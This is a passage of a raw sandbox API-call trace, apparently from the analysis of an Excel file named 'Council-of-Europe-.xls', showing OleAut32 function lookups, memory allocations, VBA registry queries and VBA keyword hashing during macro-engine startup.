(hModule=0x7fefdea0000, lpProcName="VarDateFromUdate") returned 0x7fefdea5c90 [0155.031] GetProcAddress (hModule=0x7fefdea0000, lpProcName="VarUdateFromDate") returned 0x7fefdea6330 [0155.032] GetProcAddress (hModule=0x7fefdea0000, lpProcName="GetAltMonthNames") returned 0x7fefdec66c0 [0155.032] GetProcAddress (hModule=0x7fefdea0000, lpProcName="VarNumFromParseNum") returned 0x7fefdea4710 [0155.033] GetProcAddress (hModule=0x7fefdea0000, lpProcName="VarParseNumFromStr") returned 0x7fefdea48f0 [0155.034] GetProcAddress (hModule=0x7fefdea0000, lpProcName="VarDecFromR4") returned 0x7fefdedb640 [0155.034] GetProcAddress (hModule=0x7fefdea0000, lpProcName="VarDecFromR8") returned 0x7fefdedb360 [0155.035] GetProcAddress (hModule=0x7fefdea0000, lpProcName="VarDecFromDate") returned 0x7fefdee2640 [0155.036] GetProcAddress (hModule=0x7fefdea0000, lpProcName="VarDecFromI4") returned 0x7fefdec58a0 [0155.037] GetProcAddress (hModule=0x7fefdea0000, lpProcName="VarDecFromCy") returned 0x7fefdec5820 [0155.037] GetProcAddress (hModule=0x7fefdea0000, lpProcName="VarR4FromDec") returned 0x7fefdedaf20 [0155.038] GetProcAddress (hModule=0x7fefdea0000, lpProcName="GetRecordInfoFromTypeInfo") returned 0x7fefdefa0c0 [0155.039] GetProcAddress (hModule=0x7fefdea0000, lpProcName="GetRecordInfoFromGuids") returned 0x7fefdf32160 [0155.040] GetProcAddress (hModule=0x7fefdea0000, lpProcName="SafeArrayGetRecordInfo") returned 0x7fefdec5af0 [0155.040] GetProcAddress (hModule=0x7fefdea0000, lpProcName="SafeArraySetRecordInfo") returned 0x7fefdec5a90 [0155.041] GetProcAddress (hModule=0x7fefdea0000, lpProcName="SafeArrayGetIID") returned 0x7fefdec5a60 [0155.042] GetProcAddress (hModule=0x7fefdea0000, lpProcName="SafeArraySetIID") returned 0x7fefdec5a30 [0155.043] GetProcAddress (hModule=0x7fefdea0000, lpProcName="SafeArrayCopyData") returned 0x7fefdea60b0 [0155.043] GetProcAddress (hModule=0x7fefdea0000, lpProcName="SafeArrayAllocDescriptorEx") returned 0x7fefdea3e90 [0155.044] GetProcAddress (hModule=0x7fefdea0000, lpProcName="SafeArrayCreateEx") returned 0x7fefdef9f80 [0155.045] GetProcAddress (hModule=0x7fefdea0000, lpProcName="VarFormat") returned 0x7fefdf29b20 [0155.046] GetProcAddress (hModule=0x7fefdea0000, lpProcName="VarFormatDateTime") returned 0x7fefdf29aa0 [0155.047] GetProcAddress (hModule=0x7fefdea0000, lpProcName="VarFormatNumber") returned 0x7fefdf29990 [0155.048] GetProcAddress (hModule=0x7fefdea0000, lpProcName="VarFormatPercent") returned 0x7fefdf29890 [0155.048] GetProcAddress (hModule=0x7fefdea0000, lpProcName="VarFormatCurrency") returned 0x7fefdf29770 [0155.049] GetProcAddress (hModule=0x7fefdea0000, lpProcName="VarWeekdayName") returned 0x7fefdf0b8d0 [0155.050] GetProcAddress (hModule=0x7fefdea0000, lpProcName="VarMonthName") returned 0x7fefdf0b800 [0155.051] GetProcAddress (hModule=0x7fefdea0000, lpProcName="VarAdd") returned 0x7fefdf248e0 [0155.051] GetProcAddress (hModule=0x7fefdea0000, lpProcName="VarAnd") returned 0x7fefdf29470 [0155.052] GetProcAddress (hModule=0x7fefdea0000, lpProcName="VarCat") returned 0x7fefdf296a0 [0155.053] GetProcAddress (hModule=0x7fefdea0000, lpProcName="VarDiv") returned 0x7fefdf22fe0 [0155.054] GetProcAddress (hModule=0x7fefdea0000, lpProcName="VarEqv") returned 0x7fefdf29cf0 [0155.054] GetProcAddress (hModule=0x7fefdea0000, lpProcName="VarIdiv") returned 0x7fefdf28ff0 [0155.055] GetProcAddress (hModule=0x7fefdea0000, lpProcName="VarImp") returned 0x7fefdf29c00 [0155.056] GetProcAddress (hModule=0x7fefdea0000, lpProcName="VarMod") returned 0x7fefdf28e60 [0155.057] GetProcAddress (hModule=0x7fefdea0000, lpProcName="VarMul") returned 0x7fefdf23690 [0155.057] GetProcAddress (hModule=0x7fefdea0000, lpProcName="VarOr") returned 0x7fefdf292d0 [0155.058] GetProcAddress (hModule=0x7fefdea0000, lpProcName="VarPow") returned 0x7fefdf22e80 [0155.059] GetProcAddress (hModule=0x7fefdea0000, lpProcName="VarSub") returned 0x7fefdf23f90 [0155.059] GetProcAddress (hModule=0x7fefdea0000, lpProcName="VarXor") returned 0x7fefdf291a0 [0155.060] GetProcAddress (hModule=0x7fefdea0000, lpProcName="VarAbs") returned 0x7fefdf07c30 [0155.061] GetProcAddress (hModule=0x7fefdea0000, lpProcName="VarFix") returned 0x7fefdf07a60 [0155.061] GetProcAddress (hModule=0x7fefdea0000, lpProcName="VarInt") returned 0x7fefdf07890 [0155.062] GetProcAddress (hModule=0x7fefdea0000, lpProcName="VarNeg") returned 0x7fefdf07ea0 [0155.063] GetProcAddress (hModule=0x7fefdea0000, lpProcName="VarNot") returned 0x7fefdf29600 [0155.063] GetProcAddress (hModule=0x7fefdea0000, lpProcName="VarRound") returned 0x7fefdf076a0 [0155.064] GetProcAddress (hModule=0x7fefdea0000, lpProcName="VarCmp") returned 0x7fefdf283f0 [0155.065] GetProcAddress (hModule=0x7fefdea0000, lpProcName="VarDecAdd") returned 0x7fefded3070 [0155.066] GetProcAddress (hModule=0x7fefdea0000, lpProcName="VarDecCmp") returned 0x7fefdedd700 [0155.066] GetProcAddress (hModule=0x7fefdea0000, lpProcName="VarBstrCat") returned 0x7fefdedd890 [0155.067] GetProcAddress (hModule=0x7fefdea0000, lpProcName="VarCyMulI4") returned 0x7fefdebcaf0 [0155.068] GetProcAddress (hModule=0x7fefdea0000, lpProcName="VarBstrCmp") returned 0x7fefdec8a00 [0155.069] IMalloc:Alloc (This=0x7fefecb5380, cb=0x20) returned 0x787eaa0 [0155.069] GetUserDefaultLCID () returned 0x409 [0155.089] IMalloc:Alloc (This=0x7fefecb5380, cb=0x3c) returned 0x7f254a0 [0155.089] IMalloc:Alloc (This=0x7fefecb5380, cb=0x38) returned 0x78c0530 [0155.089] IMalloc:Alloc (This=0x7fefecb5380, cb=0x20000*=0x78746341) returned 0xa006220 [0155.089] IMalloc:Alloc (This=0x7fefecb5380, cb=0x20) returned 0x78822b0 [0155.094] IMalloc:Alloc (This=0x7fefecb5380, cb=0x7d8) returned 0x98be570 [0155.095] IMalloc:Alloc (This=0x7fefecb5380, cb=0x98) returned 0x7886060 [0155.096] IMalloc:Alloc (This=0x7fefecb5380, cb=0x20) returned 0x787f100 [0155.097] IMalloc:Alloc (This=0x7fefecb5380, cb=0x28) returned 0x787f160 [0155.105] malloc (_Size=0xc8) returned 0xc50c680 [0155.107] lstrcmpiW (lpString1="C:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls", lpString2="") returned 1 [0155.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls", cchWideChar=-1, lpMultiByteStr=0x1d1050, cbMultiByte=97, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls", lpUsedDefaultChar=0x0) returned 49 [0155.107] lstrlenA (lpString="C:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls") returned 48 [0155.107] lstrcpyA (in: lpString1=0xc50c750, lpString2="C:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls" | out: lpString1="C:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls") returned="C:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls" [0155.108] SetCursor (hCursor=0x10007) returned 0x10007 [0155.108] malloc (_Size=0x3f0) returned 0xc50c7d0 [0155.108] malloc (_Size=0x60) returned 0xc50ccf0 [0155.108] GetCurrentThreadId () returned 0xae8 [0155.108] GetCurrentThreadId () returned 0xae8 [0155.108] malloc (_Size=0x20) returned 0xc50cd60 [0155.109] malloc (_Size=0x818) returned 0xc50cd90 [0155.109] malloc (_Size=0x818) returned 0xc50d5b0 [0155.109] malloc (_Size=0x28) returned 0xc50ddd0 [0155.109] malloc (_Size=0x60) returned 0xc50de00 [0155.109] malloc (_Size=0xa8) returned 0xc50de70 [0155.109] IMalloc:Alloc (This=0x7fefecb5380, cb=0x4) returned 0x241eaf0 [0155.109] IMalloc:Alloc (This=0x7fefecb5380, cb=0xf0) returned 0x95c96e0 [0155.109] IMalloc:Alloc (This=0x7fefecb5380, cb=0x80) returned 0x9c90180 [0155.109] IMalloc:Alloc (This=0x7fefecb5380, cb=0x280) returned 0x7e04bc0 [0155.110] IMalloc:Alloc (This=0x7fefecb5380, cb=0xa08) returned 0x9ad06b0 [0155.110] IMalloc:Alloc (This=0x7fefecb5380, cb=0x1738) returned 0x7887f90 [0155.110] GetLocalTime (in: lpSystemTime=0x1d0858 | out: lpSystemTime=0x1d0858*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x3, wDay=0x8, wHour=0x14, wMinute=0x2e, wSecond=0x2d, wMilliseconds=0x20c)) [0155.110] _ultow_s (in: _Value=0x6078a635, _Buffer=0x7e04bea, _BufferCount=0x103, _Radix=16 | out: _Buffer="6078a635") returned 0x0 [0155.110] wcsncpy_s (in: _Destination=0x1d0520, _SizeInWords=0x108, _Source="*\\Z006078a635", _MaxCount=0x106 | out: _Destination="*\\Z006078a635") returned 0x0 [0155.110] CharLowerBuffW (in: lpsz="*\\Z006078a635", cchLength=0xd | out: lpsz="*\\z006078a635") returned 0xd [0155.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z006078a635", cchWideChar=14, lpMultiByteStr=0x1d0450, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z006078a635", lpUsedDefaultChar=0x0) returned 14 [0155.110] wcscpy_s (in: _Destination=0x9c901a0, _SizeInWords=0xe, _Source="*\\Z006078a635" | out: _Destination="*\\Z006078a635") returned 0x0 [0155.111] wcsncpy_s (in: _Destination=0x1d0560, _SizeInWords=0x108, _Source="*\\Z006078a635", _MaxCount=0x106 | out: _Destination="*\\Z006078a635") returned 0x0 [0155.111] CharLowerBuffW (in: lpsz="*\\Z006078a635", cchLength=0xd | out: lpsz="*\\z006078a635") returned 0xd [0155.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z006078a635", cchWideChar=14, lpMultiByteStr=0x1d0490, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z006078a635", lpUsedDefaultChar=0x0) returned 14 [0155.113] lstrcpyA (in: lpString1=0xc50c790, lpString2="C:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls" | out: lpString1="C:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls") returned="C:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls" [0155.113] lstrcpyA (in: lpString1=0xc50c790, lpString2="C:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls" | out: lpString1="C:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls") returned="C:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls" [0155.113] lstrcpyA (in: lpString1=0xc50c790, lpString2="C:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls" | out: lpString1="C:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls") returned="C:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls" [0155.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xc50c790, cbMultiByte=-1, lpWideCharStr=0x1d0ec0, cchWideChar=49 | out: lpWideCharStr="C:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls") returned 49 [0155.113] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0155.113] wcscpy_s (in: _Destination=0x1d0c66, _SizeInWords=0x105, _Source="C:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls" | out: _Destination="C:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls") returned 0x0 [0155.113] wcsncpy_s (in: _Destination=0x1d0880, _SizeInWords=0x108, _Source="*\\Z006078a635", _MaxCount=0x106 | out: _Destination="*\\Z006078a635") returned 0x0 [0155.113] CharLowerBuffW (in: lpsz="*\\Z006078a635", cchLength=0xd | out: lpsz="*\\z006078a635") returned 0xd [0155.113] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z006078a635", cchWideChar=14, lpMultiByteStr=0x1d07b0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z006078a635", lpUsedDefaultChar=0x0) returned 14 [0155.113] _wcsicmp (_String1="*\\Z006078a635", _String2="*\\Z006078a635") returned 0 [0155.113] wcsncpy_s (in: _Destination=0x1d0880, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls") returned 0x0 [0155.113] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls", cchLength=0x33 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\council-of-europe-.xls") returned 0x33 [0155.113] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\council-of-europe-.xls", cchWideChar=52, lpMultiByteStr=0x1d07b0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\council-of-europe-.xls", lpUsedDefaultChar=0x0) returned 52 [0155.113] IMalloc:Realloc (This=0x7fefecb5380, pv=0x9c90180, cb=0x100) returned 0x9950580 [0155.113] wcscpy_s (in: _Destination=0x99505c0, _SizeInWords=0x34, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls" | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls") returned 0x0 [0155.113] wcsncpy_s (in: _Destination=0x1d0880, _SizeInWords=0x108, _Source="*\\Z006078a635", _MaxCount=0x106 | out: _Destination="*\\Z006078a635") returned 0x0 [0155.113] CharLowerBuffW (in: lpsz="*\\Z006078a635", cchLength=0xd | out: lpsz="*\\z006078a635") returned 0xd [0155.114] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z006078a635", cchWideChar=14, lpMultiByteStr=0x1d07b0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z006078a635", lpUsedDefaultChar=0x0) returned 14 [0155.114] _wcsicmp (_String1="*\\Z006078a635", _String2="*\\Z006078a635") returned 0 [0155.114] wcsncpy_s (in: _Destination=0x1d08c0, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls") returned 0x0 [0155.114] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls", cchLength=0x33 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\council-of-europe-.xls") returned 0x33 [0155.114] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\council-of-europe-.xls", cchWideChar=52, lpMultiByteStr=0x1d07f0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\council-of-europe-.xls", lpUsedDefaultChar=0x0) returned 52 [0155.114] wcscpy_s (in: _Destination=0x7e04be0, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls" | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls") returned 0x0 [0155.116] IMalloc:Alloc (This=0x7fefecb5380, cb=0x84) returned 0x9c8ff40 [0155.116] wcscpy_s (in: _Destination=0x9c8ffb0, _SizeInWords=0x7, _Source="__SRP_" | out: _Destination="__SRP_") returned 0x0 [0155.116] IMalloc:Realloc (This=0x7fefecb5380, pv=0x0, cb=0x180) returned 0x99f30e0 [0155.116] IMalloc:Alloc (This=0x7fefecb5380, cb=0xb8) returned 0x9abfad0 [0155.116] IMalloc:Alloc (This=0x7fefecb5380, cb=0xb8) returned 0x9abeed0 [0155.116] IMalloc:Alloc (This=0x7fefecb5380, cb=0x230) returned 0x98089d0 [0155.116] IMalloc:Realloc (This=0x7fefecb5380, pv=0x0, cb=0x80) returned 0x9c900f0 [0155.116] IMalloc:Alloc (This=0x7fefecb5380, cb=0x230) returned 0x980a590 [0155.116] IMalloc:Alloc (This=0x7fefecb5380, cb=0x230) returned 0x980aa30 [0155.116] IMalloc:Alloc (This=0x7fefecb5380, cb=0x28) returned 0x787f130 [0155.117] IMalloc:Alloc (This=0x7fefecb5380, cb=0x10) returned 0x9a502d0 [0155.117] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x1d015c, cchData=6 | out: lpLCData="1252") returned 5 [0155.117] atoi (_Str="1252") returned 1252 [0155.117] GetLocalTime (in: lpSystemTime=0x1d0150 | out: lpSystemTime=0x1d0150*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x3, wDay=0x8, wHour=0x14, wMinute=0x2e, wSecond=0x2d, wMilliseconds=0x20c)) [0155.118] IMalloc:Alloc (This=0x7fefecb5380, cb=0x80) returned 0x9c8fe20 [0155.118] IMalloc:Alloc (This=0x7fefecb5380, cb=0x0) returned 0x248f930 [0155.118] IMalloc:Alloc (This=0x7fefecb5380, cb=0x80) returned 0x9c8ffd0 [0155.118] IMalloc:Alloc (This=0x7fefecb5380, cb=0x20) returned 0x787f1c0 [0155.118] IMalloc:Alloc (This=0x7fefecb5380, cb=0x80) returned 0x9c8fd90 [0155.118] IMalloc:Realloc (This=0x7fefecb5380, pv=0x9c8fd90, cb=0x280) returned 0x7e062d0 [0155.118] IMalloc:Alloc (This=0x7fefecb5380, cb=0x0) returned 0x248f940 [0155.118] IMalloc:Alloc (This=0x7fefecb5380, cb=0x0) returned 0x248f920 [0155.118] strcpy_s (in: _Dst=0x1cff30, _DstSize=0xc8, _Src="Software\\Microsoft\\VBA\\" | out: _Dst="Software\\Microsoft\\VBA\\") returned 0x0 [0155.118] strcat_s (in: _Destination="Software\\Microsoft\\VBA\\", _SizeInBytes=0xc8, _Source="7.1\\Common" | out: _Destination="Software\\Microsoft\\VBA\\7.1\\Common") returned 0x0 [0155.118] RegCreateKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x7fee52004a8, lpdwDisposition=0x0 | out: phkResult=0x7fee52004a8*=0xecc, lpdwDisposition=0x0) returned 0x0 [0155.118] RegQueryValueExA (in: hKey=0xecc, lpValueName="RequireDeclaration", lpReserved=0x0, lpType=0x1d0008, lpData=0x1d0000, lpcbData=0x1d0004*=0x4 | out: lpType=0x1d0008*=0x0, lpData=0x1d0000*=0xdc, lpcbData=0x1d0004*=0x4) returned 0x2 [0155.118] RegQueryValueExA (in: hKey=0xecc, lpValueName="CompileOnDemand", lpReserved=0x0, lpType=0x1d0008, lpData=0x1d0000, lpcbData=0x1d0004*=0x4 | out: lpType=0x1d0008*=0x0, lpData=0x1d0000*=0x0, lpcbData=0x1d0004*=0x4) returned 0x2 [0155.118] RegQueryValueExA (in: hKey=0xecc, lpValueName="NotifyUserBeforeStateLoss", lpReserved=0x0, lpType=0x1d0008, lpData=0x1d0000, lpcbData=0x1d0004*=0x4 | out: lpType=0x1d0008*=0x0, lpData=0x1d0000*=0x1, lpcbData=0x1d0004*=0x4) returned 0x2 [0155.119] RegQueryValueExA (in: hKey=0xecc, lpValueName="BackGroundCompile", lpReserved=0x0, lpType=0x1d0008, lpData=0x1d0000, lpcbData=0x1d0004*=0x4 | out: lpType=0x1d0008*=0x0, lpData=0x1d0000*=0x0, lpcbData=0x1d0004*=0x4) returned 0x2 [0155.119] RegQueryValueExA (in: hKey=0xecc, lpValueName="BreakOnAllErrors", lpReserved=0x0, lpType=0x1d0008, lpData=0x1d0000, lpcbData=0x1d0004*=0x4 | out: lpType=0x1d0008*=0x0, lpData=0x1d0000*=0xff, lpcbData=0x1d0004*=0x4) returned 0x2 [0155.119] RegQueryValueExA (in: hKey=0xecc, lpValueName="BreakOnServerErrors", lpReserved=0x0, lpType=0x1d0008, lpData=0x1d0000, lpcbData=0x1d0004*=0x4 | out: lpType=0x1d0008*=0x0, lpData=0x1d0000*=0x0, lpcbData=0x1d0004*=0x4) returned 0x2 [0155.119] RegCloseKey (hKey=0xecc) returned 0x0 [0155.119] IMalloc:Alloc (This=0x7fefecb5380, cb=0xc0) returned 0x9c9ba90 [0155.119] IMalloc:Alloc (This=0x7fefecb5380, cb=0xc0) returned 0x9c9bb60 [0155.119] IMalloc:Alloc (This=0x7fefecb5380, cb=0x1300) returned 0x9952ac0 [0155.119] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x4950000 [0155.121] VirtualAlloc (lpAddress=0x0, dwSize=0x40000, flAllocationType=0x2000, flProtect=0x4) returned 0x6200000 [0155.121] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Left") returned 0x107be5 [0155.122] IMalloc:Realloc (This=0x7fefecb5380, pv=0x0, cb=0x30) returned 0x25c5d10 [0155.122] VirtualAlloc (lpAddress=0x0, dwSize=0x3000, flAllocationType=0x1000, flProtect=0x4) returned 0x4960000 [0155.123] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Object") returned 0x102ec1 [0155.123] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4de0000 [0155.124] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x4eb0000 [0155.125] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x4ec0000 [0155.126] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Intrinsics") returned 0x109464 [0155.127] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x4ed0000 [0155.128] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Unknown") returned 0x10a11d [0155.128] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="") returned 0x10c0b3 [0155.130] IMalloc:Alloc (This=0x7fefecb5380, cb=0x420) returned 0x7db6e90 [0155.133] GetProcAddress (hModule=0x7fee4b80000, lpProcName=0x7fee51cb088) returned 0x7fee4b8fcd0 [0155.133] VirtualAlloc (lpAddress=0x0, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4ef0000 [0155.134] VirtualAlloc (lpAddress=0x0, dwSize=0x40000, flAllocationType=0x2000, flProtect=0x4) returned 0x6730000 [0155.157] IMalloc:Alloc (This=0x7fefecb5380, cb=0x420) returned 0x7db72e0 [0155.157] CExposedStream::AddRef () returned 0x2 [0155.157] CExposedStream::Release () returned 0x1 [0155.157] CExposedStream::Release () returned 0x0 [0155.157] IMalloc:Free (This=0x7fefecb5380, pv=0x7db72e0) [0155.157] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="0") returned 0x101047 [0155.157] IMalloc:Realloc (This=0x7fefecb5380, pv=0x0, cb=0x30) returned 0x25c7390 [0155.157] VirtualAlloc (lpAddress=0x0, dwSize=0x3000, flAllocationType=0x1000, flProtect=0x4) returned 0x5730000 [0155.160] VirtualAlloc (lpAddress=0x6730000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x6730000 [0155.161] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Abs") returned 0x1072bc [0155.161] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Access") returned 0x101d98 [0155.161] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="AddressOf") returned 0x10e252 [0155.161] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Alias") returned 0x10bf6d [0155.161] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="And") returned 0x107469 [0155.161] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Any") returned 0x10747a [0155.161] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Append") returned 0x108f83 [0155.162] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Array") returned 0x109183 [0155.162] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0155.162] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Assert") returned 0x1096e9 [0155.162] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="B") returned 0x101059 [0155.162] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Base") returned 0x10afa9 [0155.162] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BF") returned 0x105ca5 [0155.162] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Binary") returned 0x1008a0 [0155.162] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Boolean") returned 0x10978e [0155.162] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ByRef") returned 0x1074ef [0155.162] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Byte") returned 0x101a83 [0155.162] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ByVal") returned 0x1089c5 [0155.162] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Call") returned 0x10744b [0155.162] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Case") returned 0x107547 [0155.162] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CBool") returned 0x104c74 [0155.162] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CByte") returned 0x106d3c [0155.162] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CCur") returned 0x108050 [0155.162] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CDate") returned 0x108dc3 [0155.162] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CDec") returned 0x10834a [0155.162] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CDbl") returned 0x1082e4 [0155.162] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CDecl") returned 0x10a0b9 [0155.162] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ChDir") returned 0x10b2fb [0155.163] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CInt") returned 0x109f65 [0155.163] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Circle") returned 0x103fd1 [0155.163] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CLng") returned 0x10af63 [0155.163] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Close") returned 0x1005ab [0155.163] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Compare") returned 0x10af82 [0155.163] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Const") returned 0x10517a [0155.163] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CSng") returned 0x10d4d2 [0155.163] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CStr") returned 0x10d5bb [0155.163] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CurDir") returned 0x101bab [0155.163] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CurDir$") returned 0x10f7cc [0155.163] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CurDir") returned 0x101bab [0155.163] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CVar") returned 0x10e307 [0155.163] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CVDate") returned 0x10cfd6 [0155.163] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CVErr") returned 0x108902 [0155.163] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Currency") returned 0x10f106 [0155.163] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Database") returned 0x10eec7 [0155.163] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Date") returned 0x103b0a [0155.163] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Date$") returned 0x1031c7 [0155.163] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Date") returned 0x103b0a [0155.163] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Debug") returned 0x10eaee [0155.163] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Decimal") returned 0x1036dd [0155.163] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Declare") returned 0x104a38 [0155.163] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefBool") returned 0x1091ad [0155.163] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefByte") returned 0x10b275 [0155.163] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefCur") returned 0x10cc45 [0155.163] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefDate") returned 0x10d2fc [0155.164] 